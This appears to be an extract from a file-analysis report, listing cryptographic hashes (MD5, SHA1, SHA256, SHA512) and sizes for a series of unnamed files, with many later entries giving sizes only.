MD5e3c90269450a47a935be150c287c4847
SHA1bd3e64f30e15a28dcc4c8c9614623b323d445d40
SHA256302e6ca381cb05d556d707a1b25972e3dbeae1a53a2af4f799674781bea2d6b4
SHA51281faa9e74df9221bc93bbf7a203aad4901833c33d7dc935c296b55b6d3aebf1e372e29484027747d75e47ea9102b5f952c3de769f7c507a50717771fd9ea6087
-
Filesize
2.9MB
MD5951499584733ea139a14b6f4367e4e8d
SHA1a9d3836a745ca70f557df00432701b928f163776
SHA2561c9d7d04c2e5bd345fb19f2117cbb59efe2a79e773029513e5cbdfee55a29867
SHA5121a1229e05b2015b7a8dce5f41c2ab150e81b73ad8a49dc9b188a235704f87aee7d4f3d1284247fdf6da86415b72d8e378112972025862eba7e277f072b860614
-
Filesize
33.3MB
MD524bc01296b99330e0df22a3ea1384c2e
SHA1eb693aa43df2ccee3084e0b4e646a28247d599fe
SHA256582b864fff8cc417b1ff1484c8916d8e4829d47228099886213fb207ed6a857d
SHA51257172ee6597965800c12ed91925121e5ddd8952b23320bb4e5bd3ffbb202b6dcfb97bc0770c9f4e3642a74061949eebeb5a89e61d0cddd2196f7264e60013e00
-
Filesize
2.8MB
MD577c772e8424f5b7b766fefa2dcd048e0
SHA1a66c67bf81ecd77751c7fac7b3066eb529f8a8c3
SHA25618bb3a8d05311a4c4d4d6922126ae3de53c765b28e393e8935fce1ad8b8e4a34
SHA512b0ede3ccce36df1855f7c1ca0092f195cb46d2bcfb0c2243a5b59fb23a3bd7711e78d20a092c701dc8137f02f669e451e7146e2a4ce82eb8879e5ba340f8e1d4
-
Filesize
20.7MB
MD5e0e775350a9c9362ac55d3ac284beedb
SHA1c11d8df27e2bcf54b4893e3c03773a8c3202b5be
SHA2567c91ceaa241551591ec9815a8603d4754b6f29c702373159f5931264cd25a4a9
SHA51212437c061242d90f708e4a0961882c91a898308985b111e439bd0900aab49c53bccdb45ff94e1b7f0c06a887a5089544946dda916b556d4a4f3a964823e405dd
-
Filesize
3.9MB
MD565c1baaa0d9fc42dc3c30df93b34e2de
SHA1d368a050635088c17aeab09c0fcdd1975aca66cf
SHA2565e3f4f0dcc181b9fe4fd1756fd06133dece9eac1e8774ffebb88ffcfb2337c51
SHA5120cdd3e60cd9bfba3305262487862bc1f6ae97316ee9aaee18215725a7f9300629f4b31ac00cb68123e7372433581b5f7a14a9987d6c8c889ad7f992a424824fd
-
Filesize
5.0MB
MD5195125617c86ececf50e46e26231b499
SHA1991e0d0ee2dff210082d9b6623b392e9161d11d9
SHA25603698bb383b156cae9f72a526c0191c087cc2f09b91b641c779e1a87cd8060d6
SHA512ff64ddc4201d3d0d9d645146959d080b15190ac918cfef074ec6e53557fa1bb6d228b2f4128d075ed013dac26f2b1bba1228810a01e397719d50121d92340184
-
Filesize
1.2MB
MD5fc5f0cabe1b503f1196c793e65e79e51
SHA1162dccf174142e7faa53dd98732d00309e2870d7
SHA25654475caefe4f4c9631fb4848cbf789dee94bd5082671d6f7b4460a39c73924ba
SHA512562a9f675880dfb6030a500aec0066e034146652aee38c1e9fd03969b56818168f534f9456210f695e2dc269c1c61a79d06a9d52cf916d6d773ff5c4dc2934f8
-
Filesize
44.2MB
MD58c012b735397848e7692633b5a01d9ca
SHA1926a1919b1e36e71eaed11ba26f5ca448705051c
SHA256767a976f23ec624f9567495581c945d41f9c932d124c04368f6dd016dd96e630
SHA512b6fe0da59682814327fcc00ee1000c99ea587898f40e1d05bcfc383788ec840540ffc1df69f3f7838036f0284f2f1b3ab018836f18f0004f7b3a6983a859a446
-
Filesize
8.6MB
MD5884f50d51b323f7c9d75c444c58c1257
SHA11c55ab13969b0a8144c796b4297e22d92f189985
SHA2567bd50ebeac93427001c4bd91e16366b7a6f0f0321634f8b4402294d853d74a9a
SHA5126044e548df35420462c94fde0537d3fb31b8b27587f8bf4fe0085ed570a4a2e4d7d045889c0fb2108f207991ca5b017d846efc79567a42d421bb9a31225bbf95
-
Filesize
3.3MB
MD5a9b618255e6c7c2d3dc03dddab6929b0
SHA19be2d42af3c76a2424cd749b47d44bb5216ef332
SHA25619aec9b611d5ee2009a5bd367d548d4c08e432e7a062e4c7983789e9ee73d31d
SHA51226c003c5b238180cc168ed93aa16b91bd0323c71a8bbd9cc15115057985b2fd29c3ebd212a25c4aa71dd58a3d3e15e6745e9d58487b851971f18ec6bbc4b88f1
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
9.3MB
MD541f85272e29267ffbbf88b433f1d9b85
SHA12f67071ec4cb04c34ab351b121dee3676aaf2477
SHA256ca639ae6388c7188d1341b7ca4e8f65369850713f5cc924eadd982c933f9ca2e
SHA51260bf19a76c1a1657b2b083293c242ec9ea3f7b40eca487c8e46b3f575f8ffb92cc81b848a2d7904ab1bef7b63168cf0319efd6376257d60281eabee6c7d69d16
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
6.6MB
-
Filesize
6.6MB
-
Filesize
364KB
-
Filesize
304KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
952KB
-
Filesize
952KB
-
Filesize
364KB
-
Filesize
72KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
64KB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
1.1MB
-
Filesize
364KB
-
Filesize
364KB
-
Filesize
32KB
-
Filesize
72KB
-
Filesize
364KB